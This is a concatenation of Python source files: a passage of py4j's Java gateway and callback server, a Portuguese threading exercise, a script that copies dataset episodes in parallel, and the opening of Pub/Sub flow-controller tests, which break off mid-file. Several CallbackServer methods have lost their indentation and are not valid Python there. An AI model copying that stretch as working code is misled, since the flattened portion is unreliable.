            self._dir_sequence_and_cache = (
                result[0], result[1:] + [UserHelpAutoCompletion.KEY])
        # Return a copy so callers cannot mutate the cache.
        return self._dir_sequence_and_cache[1][:]

    def __getattr__(self, name):
        """Resolves `name` as a package or class visible in this view by
        asking the JVM."""
        if name == UserHelpAutoCompletion.KEY:
            return UserHelpAutoCompletion()

        answer = self._gateway_client.send_command(
            proto.REFLECTION_COMMAND_NAME +
            proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
            "\n" + proto.END_COMMAND_PART)
        if answer == proto.SUCCESS_PACKAGE:
            return JavaPackage(name, self._gateway_client, jvm_id=self._id)
        elif answer.startswith(proto.SUCCESS_CLASS):
            return JavaClass(
                answer[proto.CLASS_FQN_START:], self._gateway_client)
        else:
            _, error_message = get_error_message(answer)
            message = compute_exception_message(
                "{0} does not exist in the JVM".format(name), error_message)
            raise Py4JError(message)
class GatewayProperty(object):
    """Holds state shared by the callback server, the gateway, and the
    gateway connections.
    """

    def __init__(self, auto_field, pool, enable_memory_management=True):
        """
        :param auto_field: whether fields are resolved automatically on
            attribute access.
        :param pool: the pool of Python objects exposed to the Java side.
        :param enable_memory_management: whether finalizers are registered
            so remote Java objects are released when proxies are collected.
        """
        self.enable_memory_management = enable_memory_management
        self.pool = pool
        self.auto_field = auto_field
class JavaGateway(object):
    """A `JavaGateway` is the main interaction point between a Python VM and
    a JVM.

    * A `JavaGateway` instance is connected to a `Gateway` instance on the
      Java side.

    * The `entry_point` field of a `JavaGateway` instance is connected to
      the `Gateway.entryPoint` instance on the Java side.

    * The `java_gateway_server` field of a `JavaGateway` instance is connected
      to the `GatewayServer` instance on the Java side.

    * The `jvm` field of `JavaGateway` enables user to access classes, static
      members (fields and methods) and call constructors.

    Methods that are not defined by `JavaGateway` are always redirected to
    `entry_point`. For example, ``gateway.doThat()`` is equivalent to
    ``gateway.entry_point.doThat()``. This is a trade-off between convenience
    and potential confusion.
    """

    def __init__(
            self, gateway_client=None, auto_field=False,
            python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
            start_callback_server=False, auto_convert=False, eager_load=False,
            gateway_parameters=None, callback_server_parameters=None,
            python_server_entry_point=None):
        """
        :param gateway_parameters: An instance of `GatewayParameters` used to
            configure the various options of the gateway.

        :param callback_server_parameters: An instance of
            `CallbackServerParameters` used to configure various options of
            the gateway server. Must be provided to start a gateway server.
            Otherwise, callbacks won't be available.

        :param python_server_entry_point: can be requested by the Java side if
            Java is driving the communication.
        """
        self.gateway_parameters = gateway_parameters
        if not gateway_parameters:
            # Build parameters from the deprecated keyword arguments.
            self.gateway_parameters = GatewayParameters(
                auto_field=auto_field, auto_convert=auto_convert,
                eager_load=eager_load)

        self.callback_server_parameters = callback_server_parameters
        if not callback_server_parameters:
            # No parameters were provided so do not autostart callback server.
            # TODO BASE 64
            raw_token = unescape_new_line(self.gateway_parameters.auth_token)
            self.callback_server_parameters = CallbackServerParameters(
                port=python_proxy_port, eager_load=False,
                auth_token=raw_token)

        # Check for deprecation warnings
        if auto_field:
            deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")

        if auto_convert:
            deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")

        if eager_load:
            deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")

        if start_callback_server:
            deprecated(
                "JavaGateway.start_callback_server and python_proxy_port",
                "1.0", "CallbackServerParameters")
            self.callback_server_parameters.eager_load = True

        if gateway_client:
            deprecated("JavaGateway.gateway_client", "1.0",
                       "GatewayParameters")
        else:
            gateway_client = self._create_gateway_client()

        self.python_server_entry_point = python_server_entry_point
        self._python_proxy_port = python_proxy_port

        self.gateway_property = self._create_gateway_property()

        # Setup gateway client
        self.set_gateway_client(gateway_client)

        # Setup callback server property
        self._callback_server = None

        if self.gateway_parameters.eager_load:
            self._eager_load()
        if self.callback_server_parameters.eager_load:
            self.start_callback_server(self.callback_server_parameters)

    def _create_gateway_client(self):
        """Creates the default GatewayClient from the gateway parameters."""
        gateway_client = GatewayClient(
            gateway_parameters=self.gateway_parameters)
        return gateway_client

    def _create_gateway_property(self):
        """Creates the GatewayProperty shared with connections and the
        callback server, registering the Python entry point if provided."""
        gateway_property = GatewayProperty(
            self.gateway_parameters.auto_field, PythonProxyPool(),
            self.gateway_parameters.enable_memory_management)
        if self.python_server_entry_point:
            gateway_property.pool.put(
                self.python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
        return gateway_property

    def set_gateway_client(self, gateway_client):
        """Sets the gateway client for this JavaGateway. This sets the
        appropriate gateway_property and resets the main jvm view (self.jvm).

        This is for advanced usage only. And should only be set before the
        gateway is loaded.
        """
        if self.gateway_parameters.auto_convert:
            gateway_client.converters = proto.INPUT_CONVERTER
        else:
            gateway_client.converters = None
        gateway_client.gateway_property = self.gateway_property
        self._gateway_client = gateway_client
        # Proxies for the well-known remote objects.
        self.entry_point = JavaObject(
            proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
        self.java_gateway_server = JavaObject(
            proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
        self.jvm = JVMView(
            self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
            id=proto.DEFAULT_JVM_ID)

    def __getattr__(self, name):
        # Unknown attributes are treated as members of the remote entry
        # point (see class docstring).
        return self.entry_point.__getattr__(name)

    def _eager_load(self):
        # Forces a first round-trip so connection errors surface at
        # construction time rather than on first use.
        try:
            self.jvm.System.currentTimeMillis()
        except Exception:
            self.shutdown()
            raise

    def get_callback_server(self):
        return self._callback_server

    def start_callback_server(self, callback_server_parameters=None):
        """Starts the callback server.

        :param callback_server_parameters: parameters to use to start the
            server. If not provided, it will use the gateway callback server
            parameters.

        :rtype: Returns True if the server was started by this call or False
            if it was already started (you cannot have more than one started
            callback server).
        """
        if self._callback_server:
            return False
        if not callback_server_parameters:
            callback_server_parameters = self.callback_server_parameters
        self._callback_server = self._create_callback_server(
            callback_server_parameters)

        try:
            self._callback_server.start()
        except Py4JNetworkError:
            # Clean up ourselves before raising the exception.
            self.shutdown()
            self._callback_server = None
            raise
        return True

    def _create_callback_server(self, callback_server_parameters):
        callback_server = CallbackServer(
            self.gateway_property.pool, self._gateway_client,
            callback_server_parameters=callback_server_parameters)
        return callback_server

    def new_jvm_view(self, name="custom jvm"):
        """Creates a new JVM view with its own imports. A JVM view ensures
        that the import made in one view does not conflict with the import
        of another view.

        Generally, each Python module should have its own view (to replicate
        Java behavior).

        :param name: Optional name of the jvm view. Does not need to be
            unique, i.e., two distinct views can have the same name
            (internally, they will have a distinct id).

        :rtype: A JVMView instance (same class as the gateway.jvm instance).
        """
        command = proto.JVMVIEW_COMMAND_NAME +\
            proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
            get_command_part(name) +\
            proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        java_object = get_return_value(answer, self._gateway_client)

        return JVMView(
            gateway_client=self._gateway_client, jvm_name=name,
            jvm_object=java_object)

    def new_array(self, java_class, *dimensions):
        """Creates a Java array of type `java_class` of `dimensions`

        :param java_class: The :class:`JavaClass` instance representing the
            type of the array.

        :param dimensions: A list of dimensions of the array. For example
            `[1,2]` would produce an `array[1][2]`.

        :rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
            instance.

        :raises Py4JError: if no dimension is provided.
        """
        if not dimensions:
            raise Py4JError("new arrays must have at least one dimension")
        command = proto.ARRAY_COMMAND_NAME +\
            proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
            get_command_part(java_class._fqn)
        for dimension in dimensions:
            command += get_command_part(dimension)
        command += proto.END_COMMAND_PART
        answer = self._gateway_client.send_command(command)
        return get_return_value(answer, self._gateway_client)

    def shutdown(self, raise_exception=False):
        """Shuts down the :class:`GatewayClient` and the
        :class:`CallbackServer <py4j.java_callback.CallbackServer>`.

        :param raise_exception: If `True`, raise an exception if an error
            occurs while shutting down (very likely with sockets).
        """
        try:
            self._gateway_client.shutdown_gateway()
        except Exception:
            if raise_exception:
                raise
            else:
                # Fixed copy-paste: this branch concerns the gateway client,
                # not the callback server.
                logger.info(
                    "Exception while shutting down gateway client",
                    exc_info=True)
        self.shutdown_callback_server()

    def shutdown_callback_server(self, raise_exception=False):
        """Shuts down the
        :class:`CallbackServer <py4j.java_callback.CallbackServer>`.

        :param raise_exception: If `True`, raise an exception if an error
            occurs while shutting down (very likely with sockets).
        """
        if self._callback_server is None:
            # Nothing to shutdown
            return
        try:
            self._callback_server.shutdown()
        except Exception:
            if raise_exception:
                raise
            else:
                logger.info(
                    "Exception while shutting down callback server",
                    exc_info=True)

    def close_callback_server(self, raise_exception=False):
        """Closes the
        :class:`CallbackServer <py4j.java_callback.CallbackServer>`
        connections.

        :param raise_exception: If `True`, raise an exception if an error
            occurs while closing the callback server connections
            (very likely with sockets).
        """
        if self._callback_server is None:
            # Nothing to shutdown
            return
        try:
            self._callback_server.close()
        except Exception:
            if raise_exception:
                raise
            else:
                logger.info(
                    "Exception while closing callback server",
                    exc_info=True)

    def restart_callback_server(self):
        """Shuts down the callback server (if started) and restarts a new one.
        """
        self.shutdown_callback_server()
        self._callback_server = None
        self.start_callback_server(self.callback_server_parameters)

    def close(
            self, keep_callback_server=False,
            close_callback_server_connections=False):
        """Closes all gateway connections. A connection will be reopened if
        necessary (e.g., if a :class:`JavaMethod` is called).

        :param keep_callback_server: if `True`, the callback server is not
            shut down. Mutually exclusive with
            close_callback_server_connections.
        :param close_callback_server_connections: if `True`, close all
            callback server connections.
        """
        self._gateway_client.close()
        if not keep_callback_server:
            deprecated(
                "JavaGateway.close.keep_callback_server", "1.0",
                "JavaGateway.shutdown_callback_server")
            self.shutdown_callback_server()
        elif close_callback_server_connections:
            self.close_callback_server()

    def detach(self, java_object):
        """Makes the Java Gateway dereference this object.

        The equivalent of this method is called when a JavaObject instance
        is garbage collected on the Python side. This method, or gc.collect()
        should still be invoked when memory is limited or when too many
        objects are created on the Java side.

        :param java_object: The JavaObject instance to dereference (free) on
            the Java side.
        """
        java_object._detach()

    def help(self, var, pattern=None, short_name=True, display=True):
        r"""Displays a help page about a class or an object.

        :param var: JavaObject, JavaClass or JavaMember for which a help page
            will be generated.

        :param pattern: Star-pattern used to filter the members. For example
            "get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
            bargetFoo. The pattern is matched against the entire signature.
            To match only the name of a method, use "methodName(\*".

        :param short_name: If True, only the simple name of the parameter
            types and return types will be displayed. If False, the fully
            qualified name of the types will be displayed.

        :param display: If True, the help page is displayed in an interactive
            page similar to the `help` command in Python. If False, the page
            is returned as a string.
        """
        return gateway_help(
            self._gateway_client, var, pattern, short_name, display)

    @classmethod
    def launch_gateway(
            cls, port=0, jarpath="", classpath="", javaopts=None,
            die_on_exit=False, redirect_stdout=None,
            redirect_stderr=None, daemonize_redirect=True, java_path="java",
            create_new_process_group=False, enable_auth=False):
        """Launch a `Gateway` in a new Java process and create a default
        :class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
        it.

        See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
        information about this function.

        :param port: the port to launch the Java Gateway on. If no port is
            specified then an ephemeral port is used.
        :param jarpath: the path to the Py4J jar. Only necessary if the jar
            was installed at a non-standard location or if Python is using
            a different `sys.prefix` than the one that Py4J was installed
            under.
        :param classpath: the classpath used to launch the Java Gateway.
        :param javaopts: an array of extra options to pass to Java (the
            classpath should be specified using the `classpath` parameter,
            not `javaopts`.)
        :param die_on_exit: if `True`, the Java gateway process will die when
            this Python process exits or is killed.
        :param redirect_stdout: where to redirect the JVM stdout.
            If None (default)
            stdout is redirected to os.devnull. Otherwise accepts a
            file descriptor, a queue, or a deque. Will send one line at a time
            to these objects.
        :param redirect_stderr: where to redirect the JVM stdout.
            If None (default)
            stderr is redirected to os.devnull. Otherwise accepts a
            file descriptor, a queue, or a deque. Will send one line at a time
            to these objects.
        :param daemonize_redirect: if True, the consumer threads will be
            daemonized and will not prevent the main Python process from
            exiting. This means the file descriptors (stderr, stdout,
            redirect_stderr, redirect_stdout) might not be properly closed.
            This is not usually a problem, but in case of errors related
            to file descriptors, set this flag to False.
        :param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
            $JAVA_HOME is defined, otherwise it will use "java".
        :param create_new_process_group: If True, the JVM is started in a new
            process group. This ensures that signals sent to the parent Python
            process are not forwarded to the JVM. For example, sending
            Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
            the Java process will stay alive, which may be a problem for some
            scenarios though.
        :param enable_auth: If True, the server will require clients to
            provide an authentication token when connecting.

        :rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
            connected to the `Gateway` server.
        """
        if javaopts is None:
            # Avoid a shared mutable default argument (was `javaopts=[]`).
            javaopts = []
        _ret = launch_gateway(
            port, jarpath, classpath, javaopts, die_on_exit,
            redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
            daemonize_redirect=daemonize_redirect, java_path=java_path,
            create_new_process_group=create_new_process_group,
            enable_auth=enable_auth)
        if enable_auth:
            _port, _auth_token = _ret
        else:
            _port, _auth_token = _ret, None
        gateway = JavaGateway(
            gateway_parameters=GatewayParameters(port=_port,
                                                 auth_token=_auth_token))
        return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
    def get_listening_port(self):
        """Returns the port on which the callback server is listening to.

        Different than `port` when port is 0.
        """
        # _listening_port is assigned in start() from getsockname(), i.e. it
        # is the effective port after binding.
        return self._listening_port
    def get_listening_address(self):
        """Returns the address on which the callback server is listening to.

        May be different than `address` if `address` was an alias (e.g.,
        localhost).
        """
        # _listening_address is assigned in start() from getsockname().
        return self._listening_address
    def run(self):
        """Starts listening and accepting connection requests.

        This method is called when invoking `CallbackServer.start()`. A
        CallbackServer instance is created and started automatically when
        a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
        created.
        """
        try:
            with self.lock:
                self.is_shutdown = False
            logger.info("Callback Server Starting")
            self.server_socket.listen(5)
            logger.info(
                "Socket listening on {0}".
                format(smart_decode(self.server_socket.getsockname())))
            # Notify observers (signal) that the server is up.
            server_started.send(
                self, server=self)
            read_list = [self.server_socket]
            while not self.is_shutdown:
                # select() with a timeout so the loop periodically re-checks
                # the is_shutdown flag instead of blocking forever.
                readable, writable, errored = select.select(
                    read_list, [], [],
                    self.callback_server_parameters.accept_timeout)
                if self.is_shutdown:
                    break
                for s in readable:
                    socket_instance, _ = self.server_socket.accept()
                    if self.callback_server_parameters.read_timeout:
                        socket_instance.settimeout(
                            self.callback_server_parameters.read_timeout)
                    if self.ssl_context:
                        socket_instance = self.ssl_context.wrap_socket(
                            socket_instance, server_side=True)
                    # NOTE: "input" shadows the builtin; kept as-is here.
                    input = socket_instance.makefile("rb")
                    connection = self._create_connection(
                        socket_instance, input)
                    with self.lock:
                        # Only track and start the connection if no shutdown
                        # happened while we were accepting it.
                        if not self.is_shutdown:
                            self.connections.add(connection)
                            connection.start()
                            server_connection_started.send(
                                self, connection=connection)
                        else:
                            quiet_shutdown(connection.socket)
                            quiet_close(connection.socket)
        except Exception as e:
            if self.is_shutdown:
                # Expected during shutdown: the server socket is closed
                # under us, so log quietly without a traceback.
                logger.info("Error while waiting for a connection.")
            else:
                server_connection_error.send(
                    self, error=e)
                logger.exception("Error while waiting for a connection.")
        server_stopped.send(self, server=self)
def _create_connection(self, socket_instance, stream):
connection = CallbackConnection(
self.pool, stream, socket_instance, self.gateway_client,
self.callback_server_parameters, self)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
    def shutdown(self):
        """Stops listening and accepting connection requests. All live
        connections are closed.

        This method can safely be called by another thread.
        """
        logger.info("Callback Server Shutting Down")
        pre_server_shutdown.send(self, server=self)
        with self.lock:
            try:
                if self.is_shutting_down:
                    # Do not allow calling shutdown while shutdown is
                    # executing. Alternative would be to not use a
                    # reentrant lock, but we
                    # would need to check all the other uses of this lock.
                    return
                self.is_shutting_down = True
                self.is_shutdown = True
                # Closing the server socket makes the accept loop in run()
                # fail or return, which lets the thread terminate.
                quiet_shutdown(self.server_socket)
                quiet_close(self.server_socket)
                self.server_socket = None
                # Snapshot the weak set before iterating: closing a
                # connection may mutate self.connections.
                temp_connections = list(self.connections)
                for connection in temp_connections:
                    connection.close()
                self.pool.clear()
            finally:
                self.is_shutting_down = False
        # Join outside the lock so the accept thread can finish its own
        # locked sections while we wait.
        self.thread.join()
        self.thread = None
        post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
    """A `CallbackConnection` receives callbacks and garbage collection
    requests from the Java side.

    Each socket accepted by the CallbackServer is served by one such
    thread, which loops over the line-based py4j protocol until the
    stream ends or an error occurs.
    """

    def __init__(
            self, pool, input, socket_instance, gateway_client,
            callback_server_parameters, callback_server):
        super(CallbackConnection, self).__init__()
        self.pool = pool
        self.input = input
        self.socket = socket_instance
        self.gateway_client = gateway_client
        # TODO Remove in 1.0. Take it from the callback_server directly
        self.callback_server_parameters = callback_server_parameters
        if not callback_server_parameters:
            # TODO Remove in 1.0. This should never be the case.
            self.callback_server_parameters = CallbackServerParameters()
        self.callback_server = callback_server
        self.daemon = self.callback_server_parameters.daemonize_connections

    def run(self):
        """Serve protocol commands (proxy calls, GC requests) until EOF."""
        logger.info("Callback Connection ready to receive messages")
        reset = False
        # With no auth token configured, the connection is implicitly
        # authenticated.
        authenticated = self.callback_server_parameters.auth_token is None
        try:
            while True:
                command = smart_decode(self.input.readline())[:-1]
                if not authenticated:
                    token = self.callback_server_parameters.auth_token
                    # Will raise an exception if auth fails in any way.
                    authenticated = do_client_auth(
                        command, self.input, self.socket, token)
                    continue
                obj_id = smart_decode(self.input.readline())[:-1]
                logger.info(
                    "Received command {0} on object id {1}".
                    format(command, obj_id))
                # An empty object id means the stream ended.
                if obj_id is None or len(obj_id.strip()) == 0:
                    break
                if command == proto.CALL_PROXY_COMMAND_NAME:
                    return_message = self._call_proxy(obj_id, self.input)
                    self.socket.sendall(return_message.encode("utf-8"))
                elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
                    self.input.readline()
                    _garbage_collect_proxy(self.pool, obj_id)
                    self.socket.sendall(
                        proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
                else:
                    logger.error("Unknown command {0}".format(command))
                    # We're sending something to prevent blocking, but at
                    # this point, the protocol is broken.
                    self.socket.sendall(
                        proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
        except Py4JAuthenticationError:
            reset = True
            logger.exception("Could not authenticate connection.")
        except socket.timeout:
            reset = True
            # BUGFIX: the adjacent string literals previously concatenated
            # to "waiting fora message" (missing space).
            logger.info(
                "Timeout while callback connection was waiting for "
                "a message", exc_info=True)
        except Exception:
            # This is a normal exception... (same message fix as above)
            logger.info(
                "Error while callback connection was waiting for "
                "a message", exc_info=True)
        self.close(reset)

    def close(self, reset=False):
        """Close the stream and socket.

        With ``reset=True`` the socket is closed abruptly via set_linger
        (helper defined elsewhere; presumably configures SO_LINGER for an
        abortive close -- confirm) instead of a graceful shutdown.
        """
        logger.info("Closing down callback connection")
        if reset:
            set_linger(self.socket)
        else:
            # Send shutdown before closing stream and socket
            quiet_shutdown(self.socket)
        quiet_close(self.input)
        quiet_close(self.socket)
        already_closed = self.socket is None
        self.socket = None
        self.input = None
        if not already_closed:
            server_connection_stopped.send(
                self.callback_server, connection=self)

    def _call_proxy(self, obj_id, input):
        """Invoke a method on the pooled Python proxy ``obj_id``.

        Returns a protocol message carrying either the return value or the
        (optionally propagated Java) exception.
        """
        if obj_id not in self.pool:
            return proto.RETURN_MESSAGE + proto.ERROR +\
                get_command_part('Object ID unknown', self.pool)
        try:
            method = smart_decode(input.readline())[:-1]
            params = self._get_params(input)
            return_value = getattr(self.pool[obj_id], method)(*params)
            return proto.RETURN_MESSAGE + proto.SUCCESS +\
                get_command_part(return_value, self.pool)
        except Exception as e:
            logger.exception("There was an exception while executing the "
                             "Python Proxy on the Python Side.")
            if self.callback_server_parameters.propagate_java_exceptions and\
                    isinstance(e, Py4JJavaError):
                java_exception = e.java_exception
            else:
                java_exception = traceback.format_exc()
            return proto.RETURN_MESSAGE + proto.ERROR +\
                get_command_part(java_exception, self.pool)

    def _get_params(self, input):
        """Read and decode call parameters from the stream until END."""
        params = []
        temp = smart_decode(input.readline())[:-1]
        while temp != proto.END:
            param = get_return_value("y" + temp, self.gateway_client)
            params.append(param)
            temp = smart_decode(input.readline())[:-1]
        return params
class PythonProxyPool(object):
    """A `PythonProxyPool` manages proxies that are passed to the Java side.
    A proxy is a Python class that implements a Java interface.

    A proxy has an internal class named `Java` with a member named
    `implements` which is a list of fully qualified names (string) of the
    implemented interfaces.

    The `PythonProxyPool` implements a subset of the dict interface:
    `pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
    `id in pool`, `len(pool)`.

    The `PythonProxyPool` is thread-safe.
    """

    def __init__(self):
        self.lock = RLock()  # guards every access to self.dict
        self.dict = {}       # proxy id -> proxy object
        self.next_id = 0     # counter for generated ids

    def put(self, object, force_id=None):
        """Adds a proxy to the pool.

        :param object: The proxy to add to the pool.
        :param force_id: optional identifier to use instead of generating
            a new one (any truthy value).
        :rtype: A unique identifier associated with the object.
        """
        with self.lock:
            if force_id:
                proxy_id = force_id
            else:
                # Generate a fresh prefixed id; renamed from "id" to avoid
                # shadowing the builtin.
                proxy_id = proto.PYTHON_PROXY_PREFIX +\
                    smart_decode(self.next_id)
                self.next_id += 1
            self.dict[proxy_id] = object
        return proxy_id

    def __getitem__(self, key):
        with self.lock:
            return self.dict[key]

    def __delitem__(self, key):
        with self.lock:
            # del is a statement, not a function call.
            del self.dict[key]

    def clear(self):
        with self.lock:
            self.dict.clear()

    def __contains__(self, key):
        with self.lock:
            return key in self.dict

    def __len__(self):
        with self.lock:
            return len(self.dict)
# Basic registration
# Java object references (REFERENCE_TYPE) returned by the JVM are wrapped in
# JavaObject instances by default.
register_output_converter(
    proto.REFERENCE_TYPE,
    lambda target_id, gateway_client: JavaObject(target_id, gateway_client))

if PY4J_SKIP_COLLECTIONS not in os.environ or\
        os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
    # Importing py4j.java_collections presumably registers its converters as
    # an import side effect; the env var lets users opt out -- TODO confirm.
    __import__("py4j.java_collections")
|
atividade-01.py | import time
from datetime import datetime
import threading
def fun(id, data, status):
    """Print a start line, sleep two seconds, then print a finish line.

    :param id: numeric identifier of the task (parameter name kept for
        backward compatibility even though it shadows the builtin ``id``).
    :param data: timestamp string shown on the start line.
    :param status: status label shown on the start line (e.g. "Iniciada").
    """
    def _line(timestamp, state):
        # All output lines share the same "ID | hello | Data | Status" shape.
        return f"ID: {id} | hello, world | Data: {timestamp} | Status: {state}"

    print(_line(data, status))
    time.sleep(2)  # simulate some work before finishing
    print(_line(datetime.today().strftime("%Hh%Mm%Sseg"), "Finalizada"))
# Ask the user how many worker threads to launch.
x = int(input("Qual o número de threads? "))
id = 0  # running counter passed to each thread (NOTE: shadows builtin id())
for i in range(x):
    id = id + 1
    # Each thread receives its id, a start timestamp, and the initial status.
    y = threading.Thread(target=fun, args=(id, datetime.today().strftime("%Hh%Mm%Sseg"), "Iniciada"))
    y.start()
|
copy_data_fast.py | """
Script to copy data fast using multiprocessing and shutil
Usage: python copy_data_fast.py <source_dir> <target_dir> <start_episode_num> <end_episode_num>
"""
import os
import sys
import numpy as np
import shutil
import time
import multiprocessing
# Positional CLI arguments: source and destination dataset roots. Defined at
# module level so copy_episodes (run in worker processes) can read them.
source_dir = sys.argv[1]
target_dir = sys.argv[2]
def copy_episodes(episode):
    """Copy one episode directory from source_dir into target_dir.

    Copies metadata and "processed2" files, every "measurements_*" file,
    and the three RGB camera frames (Central/Left/Right) whose numeric
    suffix matches each measurements file.

    :param episode: name of the episode directory inside source_dir.
    """
    src_ep = os.path.join(source_dir, episode)
    dst_ep = os.path.join(target_dir, episode)
    # exist_ok avoids the check-then-mkdir race of the original and makes
    # reruns over a partially copied target safe.
    os.makedirs(dst_ep, exist_ok=True)
    for file_name in sorted(os.listdir(src_ep)):
        if 'metadata' in file_name or 'processed2' in file_name:
            shutil.copy2(os.path.join(src_ep, file_name),
                         os.path.join(dst_ep, file_name))
        if 'measurements_' in file_name:
            # Frame number: text after the last "_" and before the extension.
            frame = file_name.split('.')[0].split('_')[-1]
            for camera in ('CentralRGB', 'LeftRGB', 'RightRGB'):
                image = '%s_%s.png' % (camera, frame)
                shutil.copy2(os.path.join(src_ep, image),
                             os.path.join(dst_ep, image))
            shutil.copy2(os.path.join(src_ep, file_name),
                         os.path.join(dst_ep, file_name))
if __name__ == '__main__':
    # Spawn one worker process per episode directory whose numeric suffix
    # falls within [argv[3], argv[4]] (inclusive), then wait for all of them.
    episodes_list = sorted(os.listdir(source_dir))
    jobs = []
    st = time.time()
    for episode in episodes_list:
        if os.path.isdir(os.path.join(source_dir, episode)):
            # Episode number is the text after the last "_" in the dir name.
            episode_number = int(episode.split('_')[-1])
            if episode_number >= int(sys.argv[3]) and episode_number <= int(sys.argv[4]):
                print (episode)
                p = multiprocessing.Process(target=copy_episodes, args=(episode,))
                jobs.append(p)
                p.start()
    # Wait for every copy worker before reporting the elapsed time.
    for process in jobs:
        process.join()
    print ('total time taken: ', time.time()-st)
|
test_flow_controller.py | # Copyright 2020, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import threading
import time
from typing import Callable
from typing import Sequence
from typing import Union
import warnings
import pytest
import google
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.publisher import exceptions
from google.cloud.pubsub_v1.publisher.flow_controller import FlowController
from google.pubsub_v1 import types as grpc_types
def _run_in_daemon(
action: Callable[["google.cloud.pubsub_v1.types.PubsubMessage"], None],
messages: Sequence["google.cloud.pubsub_v1.types.PubsubMessage"],
all_done_event: threading.Event,
error_event: threading.Event = None,
action_pause: Union[int, float] = None,
):
"""Run flow controller action (add or remove messages) in a daemon thread."""
def run_me():
try:
for msg in messages:
if action_pause is not None:
time.sleep(action_pause)
action(msg)
except Exception:
if error_event is not None: # pragma: NO COVER
error_event.set()
else:
all_done_event.set()
thread = threading.Thread(target=run_me)
thread.daemon = True
thread.start()
def test_no_overflow_no_error():
    """Messages comfortably within both limits are accepted without error."""
    controller = FlowController(
        types.PublishFlowControl(
            message_limit=100,
            byte_limit=10000,
            limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
        )
    )
    for payload in (b"foo", b"bar", b"baz"):
        controller.add(grpc_types.PubsubMessage(data=payload))
def test_overflow_no_error_on_ignore():
    """With IGNORE behavior, exceeding the limits must not raise."""
    controller = FlowController(
        types.PublishFlowControl(
            message_limit=1,
            byte_limit=2,
            limit_exceeded_behavior=types.LimitExceededBehavior.IGNORE,
        )
    )
    for payload in (b"foo", b"bar"):
        controller.add(grpc_types.PubsubMessage(data=payload))
def test_message_count_overflow_error():
    """A second in-flight message overflows message_limit=1 and raises."""
    settings = types.PublishFlowControl(
        message_limit=1,
        byte_limit=10000,
        limit_exceeded_behavior=types.LimitExceededBehavior.ERROR,
    )
    controller = FlowController(settings)
    controller.add(grpc_types.PubsubMessage(data=b"foo"))
    with pytest.raises(exceptions.FlowControlLimitError) as error:
        controller.add(grpc_types.PubsubMessage(data=b"bar"))
    assert "messages: 2 / 1" in str(error.value)
def test_byte_size_overflow_error():
    """Two messages together exceed the byte limit; one alone does not."""
    settings = types.PublishFlowControl(
        message_limit=10000,
        byte_limit=199,
